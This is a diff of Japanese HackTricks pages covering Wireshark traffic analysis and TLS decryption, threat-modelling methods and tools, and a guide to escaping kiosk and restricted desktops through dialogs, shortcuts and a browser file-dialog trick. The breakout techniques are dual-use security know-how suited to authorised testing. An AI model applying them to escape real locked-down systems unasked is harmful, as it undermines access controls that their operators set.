_Statistics_ --> _Protocol Hierarchy_の下には、通信に関与する**プロトコル**とそれに関するデータが表示されます。
|
||||
|
||||
![](<../../../.gitbook/assets/image (572).png>)
|
||||
![](<../../../.gitbook/assets/image (583).png>)
|
||||
|
||||
**会話**
|
||||
|
||||
_Statistics_ --> _Conversations_の下には、通信中の**会話の要約**とそれに関するデータが表示されます。
|
||||
|
||||
![](<../../../.gitbook/assets/image (573).png>)
|
||||
![](<../../../.gitbook/assets/image (450).png>)
|
||||
|
||||
**エンドポイント**
|
||||
|
||||
_Statistics_ --> _Endpoints_の下には、通信中の**エンドポイントの要約**とそれに関するデータが表示されます。
|
||||
_Statistics_ --> _Endpoints_の下には、通信中の**エンドポイントの要約**とそれぞれに関するデータが表示されます。
|
||||
|
||||
![](<../../../.gitbook/assets/image (575).png>)
|
||||
![](<../../../.gitbook/assets/image (893).png>)
|
||||
|
||||
**DNS情報**
|
||||
|
||||
_Statistics_ --> _DNS_の下には、キャプチャされたDNSリクエストに関する統計が表示されます。
|
||||
|
||||
![](<../../../.gitbook/assets/image (577).png>)
|
||||
![](<../../../.gitbook/assets/image (1060).png>)
|
||||
|
||||
**I/Oグラフ**
|
||||
|
||||
_Statistics_ --> _I/O Graph_の下には、通信の**グラフ**が表示されます。
|
||||
|
||||
![](<../../../.gitbook/assets/image (574).png>)
|
||||
![](<../../../.gitbook/assets/image (989).png>)
|
||||
|
||||
### フィルター
|
||||
### フィルタ
|
||||
|
||||
ここでは、プロトコルに応じたWiresharkフィルターを見つけることができます:[https://www.wireshark.org/docs/dfref/](https://www.wireshark.org/docs/dfref/)\
|
||||
他の興味深いフィルター:
|
||||
ここでは、プロトコルに応じたWiresharkフィルタを見つけることができます:[https://www.wireshark.org/docs/dfref/](https://www.wireshark.org/docs/dfref/)\
|
||||
他の興味深いフィルタ:
|
||||
|
||||
- `(http.request or ssl.handshake.type == 1) and !(udp.port eq 1900)`
|
||||
- HTTPおよび初期HTTPSトラフィック
|
||||
|
@ -89,15 +101,15 @@ _Statistics_ --> _I/O Graph_の下には、通信の**グラフ**が表示され
|
|||
|
||||
### 無料のpcapラボ
|
||||
|
||||
**無料のチャレンジで練習する:[https://www.malware-traffic-analysis.net/](https://www.malware-traffic-analysis.net)**
|
||||
**無料のチャレンジで練習:** [**https://www.malware-traffic-analysis.net/**](https://www.malware-traffic-analysis.net)
|
||||
|
||||
## ドメインの識別
|
||||
|
||||
Host HTTPヘッダーを表示する列を追加できます:
|
||||
|
||||
![](<../../../.gitbook/assets/image (403).png>)
|
||||
![](<../../../.gitbook/assets/image (635).png>)
|
||||
|
||||
そして、初期化されたHTTPS接続からサーバー名を追加する列を追加できます(**ssl.handshake.type == 1**):
|
||||
そして、初期化HTTPS接続からサーバー名を追加する列を追加できます(**ssl.handshake.type == 1**):
|
||||
|
||||
![](<../../../.gitbook/assets/image (408) (1).png>)
|
||||
|
||||
|
@ -107,23 +119,23 @@ Host HTTPヘッダーを表示する列を追加できます:
|
|||
|
||||
現在のWiresharkでは、`bootp`の代わりに`DHCP`を検索する必要があります
|
||||
|
||||
![](<../../../.gitbook/assets/image (404).png>)
|
||||
![](<../../../.gitbook/assets/image (1010).png>)
|
||||
|
||||
### NBNSから
|
||||
|
||||
![](<../../../.gitbook/assets/image (405).png>)
|
||||
![](<../../../.gitbook/assets/image (1000).png>)
|
||||
|
||||
## TLSの復号化
|
||||
|
||||
### サーバーの秘密鍵を使用してhttpsトラフィックを復号化する
|
||||
### サーバーのプライベートキーを使用してhttpsトラフィックを復号化
|
||||
|
||||
_edit>preference>protocol>ssl>_
|
||||
|
||||
![](<../../../.gitbook/assets/image (98).png>)
|
||||
![](<../../../.gitbook/assets/image (1100).png>)
|
||||
|
||||
_Edit_を押して、サーバーとプライベートキーのすべてのデータを追加します(_IP、ポート、プロトコル、キーファイル、パスワード_)
|
||||
_Edit_を押して、サーバーとプライベートキーのすべてのデータ(_IP、ポート、プロトコル、キーファイル、パスワード_)を追加します
|
||||
|
||||
### 対称セッションキーを使用してhttpsトラフィックを復号化する
|
||||
### 対称セッションキーを使用してhttpsトラフィックを復号化
|
||||
|
||||
FirefoxとChromeの両方には、TLSセッションキーを記録する機能があり、これをWiresharkで使用してTLSトラフィックを復号化できます。これにより、セキュアな通信の詳細な分析が可能になります。この復号化を実行する方法の詳細については、[Red Flag Security](https://redflagsecurity.net/2019/03/10/decrypting-tls-wireshark/)のガイドで見つけることができます。
|
||||
|
||||
|
@ -131,12 +143,11 @@ FirefoxとChromeの両方には、TLSセッションキーを記録する機能
|
|||
|
||||
共有キーのファイルは次のようになります:
|
||||
|
||||
![](<../../../.gitbook/assets/image (99).png>)
|
||||
![](<../../../.gitbook/assets/image (817).png>)
|
||||
|
||||
Wiresharkにこれをインポートするには、\_edit > preference > protocol > ssl > に移動し、(Pre)-Master-Secretログファイル名にインポートします:
|
||||
|
||||
![](<../../../.gitbook/assets/image (100).png>)
|
||||
|
||||
![](<../../../.gitbook/assets/image (986).png>)
|
||||
## ADB通信
|
||||
|
||||
APKが送信されたADB通信からAPKを抽出します:
|
||||
|
@ -166,16 +177,29 @@ f = open('all_bytes.data', 'w+b')
|
|||
f.write(all_bytes)
|
||||
f.close()
|
||||
```
|
||||
### [WhiteIntel](https://whiteintel.io)
|
||||
|
||||
<figure><img src="/.gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
|
||||
|
||||
[**WhiteIntel**](https://whiteintel.io)は、**ダークウェブ**を活用した検索エンジンで、企業やその顧客が**スティーラーマルウェア**によって**侵害**されていないかをチェックする**無料**の機能を提供しています。
|
||||
|
||||
WhiteIntelの主な目標は、情報窃取マルウェアによるアカウント乗っ取りやランサムウェア攻撃と戦うことです。
|
||||
|
||||
彼らのウェブサイトをチェックし、**無料**でエンジンを試すことができます:
|
||||
|
||||
{% embed url="https://whiteintel.io" %}
|
||||
|
||||
|
||||
<details>
|
||||
|
||||
<summary><strong>htARTE(HackTricks AWS Red Team Expert)</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>を使用して、ゼロからヒーローまでAWSハッキングを学ぶ</strong></a><strong>!</strong></summary>
|
||||
<summary><strong>**htARTE (HackTricks AWS Red Team Expert)**を使って、ゼロからヒーローまでAWSハッキングを学ぶ</strong></summary>
|
||||
|
||||
HackTricksをサポートする他の方法:
|
||||
|
||||
* **HackTricksで企業を宣伝したい**または**HackTricksをPDFでダウンロードしたい**場合は、[**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)をチェックしてください!
|
||||
* [**公式PEASS&HackTricksスワッグ**](https://peass.creator-spring.com)を入手する
|
||||
* [**The PEASS Family**](https://opensea.io/collection/the-peass-family)を発見し、独占的な[**NFTs**](https://opensea.io/collection/the-peass-family)コレクションをご覧ください
|
||||
* 💬 [**Discordグループ**](https://discord.gg/hRep4RUj7f)または[**telegramグループ**](https://t.me/peass)に**参加**するか、**Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)を**フォロー**してください。
|
||||
* **ハッキングトリックを共有するには、**[**HackTricks**](https://github.com/carlospolop/hacktricks)と[**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud)のGitHubリポジトリにPRを提出してください。
|
||||
* **HackTricksで企業を宣伝したり、HackTricksをPDFでダウンロードしたり**したい場合は、[**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)をチェックしてください!
|
||||
* [**公式PEASS&HackTricksスワッグ**](https://peass.creator-spring.com)を手に入れる
|
||||
* [**The PEASS Family**](https://opensea.io/collection/the-peass-family)を発見し、独占的な[NFTs](https://opensea.io/collection/the-peass-family)のコレクションを見つける
|
||||
* **💬 [**Discordグループ**](https://discord.gg/hRep4RUj7f)に参加するか、[**telegramグループ**](https://t.me/peass)に参加するか、**Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**をフォローする。**
|
||||
* **HackTricks**と**HackTricks Cloud**のgithubリポジトリにPRを提出して、あなたのハッキングトリックを共有する。
|
||||
|
||||
</details>
|
||||
|
|
|
@ -1,12 +1,12 @@
|
|||
# 脅威モデリング
|
||||
|
||||
## WhiteIntel
|
||||
### [WhiteIntel](https://whiteintel.io)
|
||||
|
||||
<figure><img src=".gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
|
||||
<figure><img src="/.gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
|
||||
|
||||
[**WhiteIntel**](https://whiteintel.io)は、**ダークウェブ**を活用した検索エンジンで、企業やその顧客が**盗難型マルウェア**によって**侵害**されていないかをチェックする**無料**機能を提供しています。
|
||||
[**WhiteIntel**](https://whiteintel.io)は**ダークウェブ**を活用した検索エンジンで、企業やその顧客が**盗難マルウェア**によって**侵害**されたかどうかをチェックする**無料**の機能を提供しています。
|
||||
|
||||
WhiteIntelの主な目標は、情報窃取マルウェアによるアカウント乗っ取りやランサムウェア攻撃と戦うことです。
|
||||
WhiteIntelの主な目標は、情報を盗むマルウェアによるアカウント乗っ取りやランサムウェア攻撃に対抗することです。
|
||||
|
||||
彼らのウェブサイトをチェックし、エンジンを**無料**で試すことができます:
|
||||
|
||||
|
@ -16,7 +16,7 @@ WhiteIntelの主な目標は、情報窃取マルウェアによるアカウン
|
|||
|
||||
## 脅威モデリング
|
||||
|
||||
脅威モデリングに関するHackTricksの包括的なガイドへようこそ!ここでは、システム内の潜在的な脆弱性を特定し、理解し、対策を立てるサイバーセキュリティの重要な側面を探求します。このスレッドは、実践的な例、役立つソフトウェア、わかりやすい説明が詰まったステップバイステップのガイドとして機能します。初心者から経験豊富な実務家まで、サイバーセキュリティの防御を強化したい人に最適です。
|
||||
サイバーセキュリティの重要な側面である脅威モデリングに関するHackTricksの包括的なガイドへようこそ!ここでは、システム内の潜在的な脆弱性を特定し、理解し、対策を立てるための探求が行われます。このスレッドは、実践的な例、役立つソフトウェア、理解しやすい説明が詰まった段階的なガイドとして、初心者から経験豊富な実践者まで、サイバーセキュリティの防御を強化することを目指しています。
|
||||
|
||||
### よく使用されるシナリオ
|
||||
|
||||
|
@ -27,32 +27,32 @@ WhiteIntelの主な目標は、情報窃取マルウェアによるアカウン
|
|||
|
||||
脅威モデルは、通常、アプリケーションの計画されたアーキテクチャや既存の構築を示す図、画像、または他の視覚的な表現として表されます。これは**データフローダイアグラム**に似ていますが、そのセキュリティ指向の設計において異なる点があります。
|
||||
|
||||
脅威モデルには、潜在的な脆弱性、リスク、または障壁を示す赤でマークされた要素がよく含まれます。リスクの特定プロセスを効率化するために、CIA(機密性、整合性、可用性)トライアドが使用され、多くの脅威モデリング手法の基礎となっています。STRIDEが最も一般的な手法の1つですが、選択される手法は特定の文脈や要件に応じて異なる場合があります。
|
||||
脅威モデルには、潜在的な脆弱性、リスク、または障壁を示す赤でマークされた要素がしばしば含まれます。リスクの特定プロセスを効率化するために、CIA(機密性、整合性、可用性)トライアドが使用され、多くの脅威モデリング手法の基礎となっており、STRIDEが最も一般的な手法の1つです。ただし、選択される手法は、特定の文脈や要件に応じて異なる場合があります。
|
||||
|
||||
### CIAトライアド
|
||||
|
||||
CIAトライアドは、情報セキュリティ分野で広く認識されているモデルで、機密性、整合性、可用性を表しています。これらの3つの柱は、脅威モデリング手法を含む多くのセキュリティ対策やポリシーの基盤を形成しており、それぞれの柱は以下のような意味を持ちます。
|
||||
CIAトライアドは、情報セキュリティ分野で広く認識されており、機密性、整合性、可用性を表しています。これらの3つの柱は、脅威モデリング手法を含む多くのセキュリティ対策やポリシーの基盤を形成しており、それぞれの脅威モデリング手法にも適用されています。
|
||||
|
||||
1. **機密性**:データやシステムが不正な個人によってアクセスされないようにすること。これはセキュリティの中心的な側面であり、データ漏洩を防ぐために適切なアクセス制御、暗号化、およびその他の対策が必要です。
|
||||
2. **整合性**:データの正確性、一貫性、および信頼性をデータのライフサイクル全体で確保すること。この原則は、データが不正な者によって変更されたり改ざんされたりしないようにすることを保証します。これにはチェックサム、ハッシュ、および他のデータ検証手法がしばしば含まれます。
|
||||
3. **可用性**:データやサービスが必要な時に認可されたユーザーに利用可能であることを保証すること。これには冗長性、障害耐性、および高可用性構成が含まれ、システムが障害に直面しても稼働し続けるようにします。
|
||||
2. **整合性**:データの正確性、一貫性、信頼性をデータのライフサイクル全体で確保すること。この原則は、データが不正な者によって変更されたり改ざんされたりしないようにすることを保証します。これには、チェックサム、ハッシュ、および他のデータ検証方法がしばしば含まれます。
|
||||
3. **可用性**:データやサービスが必要な時に認証されたユーザーにアクセス可能であることを保証すること。これには、冗長性、障害耐性、および高可用性構成が含まれ、システムが障害に直面しても稼働し続けるようにします。
|
||||
|
||||
### 脅威モデリング手法
|
||||
|
||||
1. **STRIDE**:Microsoftによって開発されたSTRIDEは、**スプーフィング、改ざん、否認、情報開示、サービス拒否、特権昇格**を表す頭字語です。各カテゴリは脅威のタイプを表し、この手法は潜在的な脅威を特定するためにプログラムやシステムの設計段階で一般的に使用されます。
|
||||
1. **STRIDE**:Microsoftによって開発されたSTRIDEは、**スプーフィング、改ざん、否認、情報開示、サービス妨害、特権昇格**を表す頭字語です。各カテゴリは脅威のタイプを表し、この手法は潜在的な脅威を特定するためにプログラムやシステムの設計段階で一般的に使用されます。
|
||||
2. **DREAD**:Microsoftの別の手法で、特定された脅威のリスク評価に使用されます。DREADは**損害の可能性、再現性、悪用可能性、影響を受けるユーザー、発見可能性**を表しています。これらの要素はスコア付けされ、その結果は特定された脅威の優先順位付けに使用されます。
|
||||
3. **PASTA**(攻撃シミュレーションと脅威分析のプロセス):これは7つのステップからなる**リスク中心**の手法です。セキュリティ目標の定義と特定、技術的範囲の作成、アプリケーション分解、脅威分析、脆弱性分析、リスク/トリアージ評価が含まれます。
|
||||
4. **Trike**:資産の防御に焦点を当てたリスクベースの手法です。リスク管理の観点から始まり、その文脈で脅威や脆弱性を考察します。
|
||||
5. **VAST**(ビジュアル、アジャイル、シンプル脅威モデリング):このアプローチは、アジャイル開発環境に統合されやすく、**脅威の視覚的表現**に焦点を当てています。他の手法から要素を組み合わせ、脅威の視覚的表現に重点を置いています。
|
||||
6. **OCTAVE**(運用上重要な脅威、資産、脆弱性評価):CERT Coordination Centerによって開発されたこのフレームワークは、**特定のシステムやソフトウェアではなく組織のリスク評価**に焦点を当てています。
|
||||
3. **PASTA**(攻撃シミュレーションと脅威分析のプロセス):これは7つのステップからなる**リスク中心**の手法です。セキュリティ目標の定義と特定、技術的範囲の作成、アプリケーションの分解、脅威分析、脆弱性分析、リスク/トリアージ評価が含まれます。
|
||||
4. **Trike**:これは資産の防御に焦点を当てたリスクベースの手法です。リスク管理の観点から始まり、その文脈で脅威や脆弱性を見ます。
|
||||
5. **VAST**(ビジュアル、アジャイル、シンプル脅威モデリング):このアプローチは、アジャイル開発環境に統合されやすく、アクセスしやすいことを目指しています。他の手法から要素を組み合わせ、**脅威の視覚的表現**に焦点を当てています。
|
||||
6. **OCTAVE**(運用上重要な脅威、資産、脆弱性評価):CERT Coordination Centerによって開発されたこのフレームワークは、**特定のシステムやソフトウェアではなく組織のリスク評価**に向けられています。
|
||||
|
||||
## ツール
|
||||
|
||||
脅威モデルの作成と管理を**支援**するために利用可能ないくつかのツールやソフトウェアソリューションがあります。以下は検討する価値のあるいくつかのツールです。
|
||||
脅威モデルの作成と管理を**支援**するために利用可能ないくつかのツールやソフトウェアソリューションがあります。以下は、検討する価値のあるいくつかのツールです。
|
||||
|
||||
### [SpiderSuite](https://github.com/3nock/SpiderSuite)
|
||||
|
||||
サイバーセキュリティ専門家向けの高度なクロスプラットフォームおよびマルチ機能GUIウェブスパイダー/クローラーです。Spider Suiteは攻撃面のマッピングと分析に使用できます。
|
||||
サイバーセキュリティ専門家向けの高度なクロスプラットフォームおよび多機能GUIウェブスパイダー/クローラーです。Spider Suiteは攻撃面のマッピングと分析に使用できます。
|
||||
|
||||
**使用方法**
|
||||
|
||||
|
@ -66,7 +66,7 @@ CIAトライアドは、情報セキュリティ分野で広く認識されて
|
|||
|
||||
### [OWASP Threat Dragon](https://github.com/OWASP/threat-dragon/releases)
|
||||
|
||||
OWASPのオープンソースプロジェクトであるThreat Dragonは、システム図作成と脅威/緩和策の自動生成を行うルールエンジンを備えたWebおよびデスクトップアプリケーションです。
|
||||
OWASPのオープンソースプロジェクトであるThreat Dragonは、システム図作成と脅威/緩和策の自動生成を含むWebおよびデスクトップアプリケーションです。
|
||||
|
||||
**使用方法**
|
||||
|
||||
|
@ -74,7 +74,7 @@ OWASPのオープンソースプロジェクトであるThreat Dragonは、シ
|
|||
|
||||
<figure><img src="../.gitbook/assets/create_new_project_1.jpg" alt=""><figcaption></figcaption></figure>
|
||||
|
||||
場合によっては、次のように見えるかもしれません:
|
||||
時々、以下のように見えるかもしれません:
|
||||
|
||||
<figure><img src="../.gitbook/assets/1_threatmodel_create_project.jpg" alt=""><figcaption></figcaption></figure>
|
||||
|
||||
|
@ -110,7 +110,7 @@ SpiderSuite Crawlerなどのツールを使用して、基本的なモデルは
|
|||
|
||||
<figure><img src="../.gitbook/assets/4_threatmodel_create-threat.jpg" alt=""><figcaption></figcaption></figure>
|
||||
|
||||
アクター脅威とプロセス脅威の違いに注意してください。アクターに脅威を追加する場合は、「スプーフィング」と「否認」のみを選択できます。ただし、この例ではプロセスエンティティに脅威を追加するため、脅威作成ボックスには次のように表示されます:
|
||||
アクター脅威とプロセス脅威の違いに注意してください。アクターに脅威を追加する場合は、「スプーフィング」と「否認」のみを選択できます。ただし、この例ではプロセスエンティティに脅威を追加するため、脅威作成ボックスに次のように表示されます:
|
||||
|
||||
<figure><img src="../.gitbook/assets/2_threatmodel_type-option.jpg" alt=""><figcaption></figcaption></figure>
|
||||
|
||||
|
@ -121,12 +121,12 @@ SpiderSuite Crawlerなどのツールを使用して、基本的なモデルは
|
|||
<figure><img src="../.gitbook/assets/threat_model_finished.jpg" alt=""><figcaption></figcaption></figure>
|
||||
### [Microsoft Threat Modeling Tool](https://aka.ms/threatmodelingtool)
|
||||
|
||||
これはMicrosoftからの無料ツールで、ソフトウェアプロジェクトの設計フェーズで脅威を見つけるのに役立ちます。STRIDE方法論を使用し、特にMicrosoftのスタックで開発している人に適しています。
|
||||
これはMicrosoftからの無料ツールで、ソフトウェアプロジェクトの設計フェーズで脅威を見つけるのに役立ちます。STRIDEメソッドを使用し、特にMicrosoftのスタックで開発している人に適しています。
|
||||
|
||||
|
||||
## WhiteIntel
|
||||
### [WhiteIntel](https://whiteintel.io)
|
||||
|
||||
<figure><img src=".gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
|
||||
<figure><img src="/.gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
|
||||
|
||||
[**WhiteIntel**](https://whiteintel.io)は**ダークウェブ**を活用した検索エンジンで、企業やその顧客が**スティーラーマルウェア**によって**侵害**されていないかをチェックする**無料**の機能を提供しています。
|
||||
|
||||
|
|
|
@ -1,26 +1,26 @@
|
|||
<details>
|
||||
|
||||
<summary><strong>htARTE(HackTricks AWS Red Team Expert)</strong>を通じて、ゼロからヒーローまでAWSハッキングを学びましょう</summary>
|
||||
<summary><strong>htARTE(HackTricks AWS Red Team Expert)</strong>を使って、<a href="https://training.hacktricks.xyz/courses/arte"><strong>AWSハッキングをゼロからヒーローまで学ぶ</strong></a><strong>!</strong></summary>
|
||||
|
||||
HackTricksをサポートする他の方法:
|
||||
|
||||
- **HackTricksで企業を宣伝したい**、または**HackTricksをPDFでダウンロードしたい**場合は、[**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)をチェックしてください!
|
||||
- [**公式PEASS&HackTricksスワッグ**](https://peass.creator-spring.com)を入手する
|
||||
- [**The PEASS Family**](https://opensea.io/collection/the-peass-family)を発見し、独占的な[**NFTs**](https://opensea.io/collection/the-peass-family)コレクションを見つける
|
||||
- 💬 [**Discordグループ**](https://discord.gg/hRep4RUj7f)に参加するか、[**telegramグループ**](https://t.me/peass)に参加するか、または**Twitter**で私たちをフォローする 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)。
|
||||
- **ハッキングテクニックを共有するために、**[**HackTricks**](https://github.com/carlospolop/hacktricks)と[**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud)のGitHubリポジトリにPRを提出する
|
||||
- **HackTricksで企業を宣伝したい**または**HackTricksをPDFでダウンロードしたい**場合は、[**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)をチェックしてください!
|
||||
- [**公式PEASS&HackTricksスウォッグ**](https://peass.creator-spring.com)を入手する
|
||||
- [**The PEASS Family**](https://opensea.io/collection/the-peass-family)を発見し、独占的な[**NFTs**](https://opensea.io/collection/the-peass-family)のコレクションを見つける
|
||||
- **💬 [Discordグループ](https://discord.gg/hRep4RUj7f)**に参加するか、[telegramグループ](https://t.me/peass)に参加するか、**Twitter**で**@carlospolopm**をフォローする🐦[**@carlospolopm**](https://twitter.com/hacktricks_live)**。**
|
||||
- **ハッキングトリックを共有するために** [**HackTricks**](https://github.com/carlospolop/hacktricks)と[**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud)のGitHubリポジトリにPRを提出する
|
||||
|
||||
</details>
|
||||
|
||||
## WhiteIntel
|
||||
### [WhiteIntel](https://whiteintel.io)
|
||||
|
||||
<figure><img src=".gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
|
||||
<figure><img src="/.gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
|
||||
|
||||
[**WhiteIntel**](https://whiteintel.io)は、**ダークウェブ**を活用した検索エンジンで、企業やその顧客が**盗難マルウェア**によって**侵害**されていないかをチェックする**無料**機能を提供しています。
|
||||
[**WhiteIntel**](https://whiteintel.io)は、**ダークウェブ**を活用した検索エンジンで、企業やその顧客が**盗難マルウェア**によって**侵害**されていないかをチェックする**無料**の機能を提供しています。
|
||||
|
||||
WhiteIntelの主な目標は、情報窃取マルウェアによるアカウント乗っ取りやランサムウェア攻撃に対抗することです。
|
||||
|
||||
彼らのウェブサイトをチェックし、**無料**でエンジンを試すことができます:
|
||||
彼らのウェブサイトをチェックして、**無料**でエンジンを試すことができます:
|
||||
|
||||
{% embed url="https://whiteintel.io" %}
|
||||
|
||||
|
@ -44,11 +44,11 @@ WhiteIntelの主な目標は、情報窃取マルウェアによるアカウン
|
|||
- ファイルの変更または新規作成
|
||||
- シンボリックリンクの作成
|
||||
- 制限された領域へのアクセス
|
||||
- 他のアプリの実行
|
||||
- 他のアプリケーションの実行
|
||||
|
||||
## コマンドの実行
|
||||
|
||||
おそらく**`開くと`**オプションを使用して、ある種のシェルを開いたり実行したりできるかもしれません。
|
||||
おそらく**`開くと`**オプションを使用して、いくつかの種類のシェルを開いたり実行したりできるかもしれません。
|
||||
|
||||
### Windows
|
||||
|
||||
|
@ -87,7 +87,7 @@ _bash、sh、zsh..._ ここで詳細を確認:[https://gtfobins.github.io/](ht
|
|||
|
||||
Console: [https://sourceforge.net/projects/console/](https://sourceforge.net/projects/console/)\
|
||||
Explorer: [https://sourceforge.net/projects/explorerplus/files/Explorer%2B%2B/](https://sourceforge.net/projects/explorerplus/files/Explorer%2B%2B/)\
|
||||
Registry editor: [https://sourceforge.net/projects/uberregedit/](https://sourceforge.net/projects/uberregedit/)
|
||||
レジストリエディター: [https://sourceforge.net/projects/uberregedit/](https://sourceforge.net/projects/uberregedit/)
|
||||
|
||||
## ブラウザからファイルシステムにアクセス
|
||||
|
||||
|
@ -124,7 +124,7 @@ Registry editor: [https://sourceforge.net/projects/uberregedit/](https://sourcef
|
|||
- CTRL+T – Internet Explorer – 新しいタブ
|
||||
- CTRL+N – Internet Explorer – 新しいページ
|
||||
- CTRL+O – ファイルを開く
|
||||
- CTRL+S – 名前を付けて保存 CTRL+N – 新しいRDP / Citrix
|
||||
- CTRL+S – 保存 CTRL+N – 新しいRDP / Citrix
|
||||
## スワイプ
|
||||
|
||||
* 左側から右側にスワイプして、すべての開いているウィンドウを表示し、KIOSKアプリを最小化してOS全体に直接アクセスします。
|
||||
|
@ -166,7 +166,7 @@ Registry editor: [https://sourceforge.net/projects/uberregedit/](https://sourcef
|
|||
|
||||
## ファイル拡張子の表示
|
||||
|
||||
詳細については、このページをチェックしてください:[https://www.howtohaven.com/system/show-file-extensions-in-windows-explorer.shtml](https://www.howtohaven.com/system/show-file-extensions-in-windows-explorer.shtml)
|
||||
詳細は次のページを参照してください:[https://www.howtohaven.com/system/show-file-extensions-in-windows-explorer.shtml](https://www.howtohaven.com/system/show-file-extensions-in-windows-explorer.shtml)
|
||||
|
||||
# ブラウザのトリック
|
||||
|
||||
|
@ -175,7 +175,7 @@ iKatのバージョンをバックアップします:
|
|||
[http://swin.es/k/](http://swin.es/k/)\
|
||||
[http://www.ikat.kronicd.net/](http://www.ikat.kronicd.net)\
|
||||
|
||||
JavaScriptを使用して共通のダイアログを作成し、ファイルエクスプローラーにアクセスします: `document.write('<input/type=file>')`
|
||||
JavaScriptを使用して共通のダイアログを作成し、ファイルエクスプローラーにアクセスします:`document.write('<input/type=file>')`
|
||||
出典:https://medium.com/@Rend_/give-me-a-browser-ill-give-you-a-shell-de19811defa0
|
||||
|
||||
# iPad
|
||||
|
@ -186,21 +186,21 @@ JavaScriptを使用して共通のダイアログを作成し、ファイルエ
|
|||
|
||||
* 4本または5本の指で片方向にスワイプ:次の/前のアプリに切り替えるため
|
||||
|
||||
* 5本の指で画面をつまむ/ホームボタンをタッチ/画面下部から上に向かって1本の指で素早くスワイプ:ホームにアクセス
|
||||
* 5本の指で画面をつまむ/ホームボタンをタッチ/画面下部から上に1本の指で素早くスワイプ:ホームにアクセスするため
|
||||
|
||||
* 画面下部から1-2インチ上に向かって1本の指でゆっくりスワイプ:ドックが表示されます
|
||||
* 画面下部から1-2インチ上に1本の指でゆっくりスワイプ:ドックが表示されます
|
||||
|
||||
* 画面上部から1本の指で下に向かってスワイプ:通知を表示します
|
||||
* 画面上部から1本の指で下にスワイプ:通知を表示します
|
||||
|
||||
* 画面の右上隅から1本の指で下にスワイプ:iPad Proのコントロールセンターを表示します
|
||||
|
||||
* 画面の左端から1-2インチの指で1本の指で素早くスワイプ:今日のビューを表示します
|
||||
* 画面の左端から1-2インチの1本の指でスワイプ:今日のビューを表示します
|
||||
|
||||
* 画面の中央から右または左に素早く1本の指でスワイプ:次の/前のアプリに切り替えます
|
||||
|
||||
* iPadの右上隅にあるOn/**Off**/Sleepボタンを押し続ける + スライドを右まで移動する:電源を切ります
|
||||
|
||||
* iPadの右上隅にあるOn/**Off**/Sleepボタンを押し続ける + ホームボタンを数秒間押し続ける:強制的に電源を切ります
|
||||
* iPadの右上隅にあるOn/**Off**/Sleepボタンを押し続ける + ホームボタンを数秒間押す:強制的に電源を切ります
|
||||
|
||||
* iPadの右上隅にあるOn/**Off**/Sleepボタンを押し続ける + ホームボタンを素早く押す:画面左下にポップアップするスクリーンショットを撮影します。両方のボタンを同時に非常に短く押すと、数秒間押し続けるかのようにハードパワーオフが実行されます。
|
||||
|
||||
|
@ -259,38 +259,38 @@ iPadキーボードまたはUSBキーボードアダプターを持っている
|
|||
| ↑↓ (上矢印、下矢印) | 選択したアイテムを同時にタップ |
|
||||
| ⌥ ↓ (Option-下矢印) | 下にスクロール |
|
||||
| ⌥↑ (Option-上矢印) | 上にスクロール |
|
||||
| ⌥← または ⌥→ (Option-左矢印またはOption-右矢印) | 左または右にスクロール |
|
||||
| ⌥←または⌥→ (Option-左矢印またはOption-右矢印) | 左または右にスクロール |
|
||||
| ^⌥S (Control-Option-S) | VoiceOverスピーチをオンまたはオフにする |
|
||||
| ⌘⇧⇥ (Command-Shift-Tab) | 前のアプリに切り替える |
|
||||
| ⌘⇥ (Command-Tab) | 元のアプリに戻る |
|
||||
| ←+→、次にOption + ← またはOption+→ | ドックを通じてナビゲートする |
|
||||
| ←+→、次にOption + ←またはOption+→ | ドックを通じてナビゲートする |
|
||||
### Safariのショートカット
|
||||
|
||||
| ショートカット | アクション |
|
||||
| ----------------------- | ----------------------------------- |
|
||||
| ⌘L (Command-L) | ロケーションを開く |
|
||||
| ⌘T | 新しいタブを開く |
|
||||
| ⌘W | 現在のタブを閉じる |
|
||||
| ⌘R | 現在のタブを更新 |
|
||||
| ⌘. | 現在のタブの読み込みを停止 |
|
||||
| ^⇥ | 次のタブに切り替え |
|
||||
| ^⇧⇥ (Control-Shift-Tab) | 前のタブに移動 |
|
||||
| ⌘L | テキスト入力/URLフィールドを選択して修正 |
|
||||
| ⌘⇧T (Command-Shift-T) | 最後に閉じたタブを開く(複数回使用可能) |
|
||||
| ⌘\[ | ブラウジング履歴で1ページ戻る |
|
||||
| ⌘] | ブラウジング履歴で1ページ進む |
|
||||
| ⌘⇧R | リーダーモードをアクティブにする |
|
||||
| ⌘L (Command-L) | ロケーションを開く |
|
||||
| ⌘T | 新しいタブを開く |
|
||||
| ⌘W | 現在のタブを閉じる |
|
||||
| ⌘R | 現在のタブを更新する |
|
||||
| ⌘. | 現在のタブの読み込みを停止する |
|
||||
| ^⇥ | 次のタブに切り替える |
|
||||
| ^⇧⇥ (Control-Shift-Tab) | 前のタブに移動する |
|
||||
| ⌘L | テキスト入力/URLフィールドを選択して修正する |
|
||||
| ⌘⇧T (Command-Shift-T) | 最後に閉じたタブを開く(複数回使用可能) |
|
||||
| ⌘\[ | ブラウジング履歴で1ページ戻る |
|
||||
| ⌘] | ブラウジング履歴で1ページ進む |
|
||||
| ⌘⇧R | リーダーモードをアクティブにする |
|
||||
|
||||
### メールのショートカット
|
||||
|
||||
| ショートカット | アクション |
|
||||
| -------------------------- | ---------------------- |
|
||||
| ⌘L | ロケーションを開く |
|
||||
| ⌘T | 新しいタブを開く |
|
||||
| ⌘W | 現在のタブを閉じる |
|
||||
